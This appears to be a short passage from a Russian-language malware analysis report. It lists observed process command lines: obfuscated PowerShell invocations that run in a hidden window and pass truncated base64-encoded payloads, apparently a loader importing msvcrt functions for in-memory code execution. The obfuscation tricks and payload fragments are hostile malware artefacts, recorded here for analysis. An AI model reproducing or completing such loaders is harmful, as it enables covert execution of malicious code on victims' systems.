Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /w 1 /C "sv XRG -;sv Hz ec;sv lt ((gv XRG).value.toString()+(gv Hz).value.toString());powershell (gv lt).value.toString() ('JABHAE4APQAnACQAbQBBAD0AJwAnAFsAUABPAEkAKAAoACIAbQBzAHYAYwByAHQAIgArA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /w 1 /C "sv XRG -;sv Hz ec;sv lt ((gv XRG).value.toString()+(gv Hz).value.toString());powershell (gv lt).value.toString() ('JABHAE4APQAnACQAbQBBAD0AJwAnAFsAUABPAEkAKAAoACIAbQBzAHYAYwByAHQAIgArA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ec JABHAE4APQAnACQAbQBBAD0AJwAnAFsAUABPAEkAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAeQB4AHAAKAB1A...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e JABtAEEAPQAnAFsAUABPAEkAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAeQB4AHAAKAB1AGkAbgB0ACAAZAB3AF...